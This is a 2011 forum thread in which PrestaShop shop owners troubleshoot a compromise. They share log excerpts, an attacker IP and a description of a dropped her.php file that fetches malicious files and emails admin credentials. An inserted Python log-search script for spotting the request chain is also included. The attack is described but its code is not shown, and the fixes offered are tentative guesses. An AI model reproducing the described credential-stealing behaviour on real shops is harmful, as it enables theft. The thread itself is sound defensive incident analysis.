Takada Posted August 24, 2011

People whose store stopped working should try to enable smarty 3 in admin>preferences>lastoptionbox, as the script deletes the folder smarty_v2.

ederntal Posted August 24, 2011

I had the same things one hour ago…

Xenocide Posted August 24, 2011

This is one of my live site's that's been hacked.

Hacker's IP was: 91.143.79.106

This is the access logs grepped for that IP:

- /themes/<mytheme>/footer.tpl was modified
- /download/ had a php file with a filename that looked like an md5 string
- /upload/ had a php file with a filename that looked like an md5 string
- /tools/smarty_v2 was deleted (Deleted whole folder)
- /tools/smarty was modified
- NO /modules/her.php

Oh, to add the files that were created had a modified time of 04:31

<<<<REMOVED ATTACHMENT - XENOCIDE >>>>

jesusruiz Posted August 24, 2011

For the shops that are not affected, do you think it is a good idea to do the following?

Rename some of the important files and also rename the folders that we know the virus changed.

With other solutions, I think we're not sure, because we do not yet know anything about this virus/hack.

Dom-T Posted August 24, 2011

Edit: Ok a slight rethink, I've re-read the code at the top of the thread and it edits the footer.tpl itself via code it downloads. Therefore it must be the initial POST to the admin area which creates her.php.

I work for a hosting company and have been trying to track this down. The her.php file is accessed via an ajax request and contains the code in the first page of this thread, which downloads the malicious files to upload/ and download/ then deletes the smarty folders and emails admin login data to the attacker.

I can't find what creates her.php initially but in every instance I've seen, it immediately follows an admin login and a click of an admin tab button. Because it's done via ajax that implies the code in footer.tpl is the source, but I can't find how this is created [see my edit at top]

To prevent the attack I've put in place an auto_prepend_file which simply does a mail() of $_SERVER then calls die() if it detects it's the her.php file which is being executed, but this is only stopping the effect rather than the cause.

One theory I have is that it's a virus on the Prestashop administrator's PC.

All attacks have a POST to /adminfolder/ajax.php, then on the next request for a tab her.php is subsequently called, for example:

ip - - [24/Aug/2011:08:53:52 +0100] "POST /shop/admin123/ajax.php HTTP/1.1" 200 20 "http://www.site.net/shop/admin123/"
ip - - [24/Aug/2011:08:53:53 +0100] "POST /shop/admin123/index.php?tab=AdminModules&token=a088c4e2726917d74b2635984e6af501 HTTP/1.1" 200 20085 "http://www.site.net/shop/admin123/"
ip - - [24/Aug/2011:08:53:54 +0100] "GET /shop/modules/her.php HTTP/1.1" 200 20 "http://www.site.net/shop/admin123/"

In terms of tracking down activity I'd possibly advise adding code which mails / logs the contents of $_POST and $_SERVER on every request to /adminfolder/index.php and /adminfolder/ajax.php as that should give a clue as to what's happening, but the niggle is it still doesn't explain how the content (which causes the malicious GET) was added to footer.tpl.

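The request sequence described in this post, turned into a search over an Apache access log. This is an added example, not code from any poster; it also pulls the five minutes either side of each her.php request, which is the excerpt the checklist earlier in the thread asks people to share. The function names, the 10-second chaining window and the sample lines (documentation addresses, placeholder token) are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Apache common/combined log format; the referer field is optional.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)")?'
)


def parse(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path_only"] = rec["path"].split("?", 1)[0]
    rec["raw"] = line.rstrip("\n")
    return rec


def find_her_requests(lines, context=timedelta(minutes=5),
                      chain=timedelta(seconds=10)):
    """Locate GET .../modules/her.php and describe what led up to each one."""
    recs = [r for r in map(parse, lines) if r]
    hits = []
    for i, hit in enumerate(recs):
        if hit["method"] != "GET" or not hit["path_only"].endswith("/modules/her.php"):
            continue
        # Earlier requests from the same client within the chaining window.
        before = [r for r in recs[:i]
                  if r["ip"] == hit["ip"] and hit["time"] - r["time"] <= chain]
        hits.append({
            "time": hit["time"],
            "ip": hit["ip"],
            "status": hit["status"],
            "referer": hit["referer"],
            "after_admin_ajax_post": any(
                r["method"] == "POST" and r["path_only"].endswith("/ajax.php")
                for r in before),
            "after_adminmodules_post": any(
                r["method"] == "POST" and "tab=AdminModules" in r["path"]
                for r in before),
            # Excerpt to save and share: every line within +/- context.
            "context": [r["raw"] for r in recs
                        if abs(r["time"] - hit["time"]) <= context],
        })
    return hits


# Constructed sample lines modelled on the three requests quoted in the post.
SAMPLE = [
    '192.0.2.10 - - [24/Aug/2011:08:53:52 +0100] "POST /shop/admin123/ajax.php HTTP/1.1" 200 20 "http://shop.example.test/shop/admin123/"',
    '192.0.2.10 - - [24/Aug/2011:08:53:53 +0100] "POST /shop/admin123/index.php?tab=AdminModules&token=TOKEN HTTP/1.1" 200 20085 "http://shop.example.test/shop/admin123/"',
    '192.0.2.10 - - [24/Aug/2011:08:53:54 +0100] "GET /shop/modules/her.php HTTP/1.1" 200 20 "http://shop.example.test/shop/admin123/"',
    '198.51.100.7 - - [24/Aug/2011:09:30:00 +0100] "GET /shop/product.php?id_product=1 HTTP/1.1" 200 5120 "-"',
]

if __name__ == "__main__":
    for h in find_her_requests(SAMPLE):
        print(h["time"].isoformat(), h["ip"], "referer:", h["referer"],
              "ajax POST first:", h["after_admin_ajax_post"])
        print("\n".join(h["context"]))
```

A hit whose referer is the admin folder and whose client address is the shop owner's own matches what several posters here observed in their logs.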
ruilong Posted August 24, 2011

> This is one of my live site's that's been hacked. Hacker's IP was: 91.143.79.106 This is the access logs grepped for that IP: /themes/<mytheme>/footer.tpl was modified /download/ had a php file with a filename that looked like an md5 string /upload/ had a php file with a filename that looked like an md5 string /tools/smarty_v2 was deleted (Deleted whole folder) /tools/smarty was modified NO /modules/her.php Oh, to add the files that were created had a modified time of 04:31

Have you checked your IP? (myip.dk)

SwiftEssentials Posted August 24, 2011

Update----

I've now seen the her.php file created on my server (now deleted). I tried a different theme and it was all fine, so I'm going to try delete my old theme and do a fresh theme install. But don't think that will stop the hack from happening again?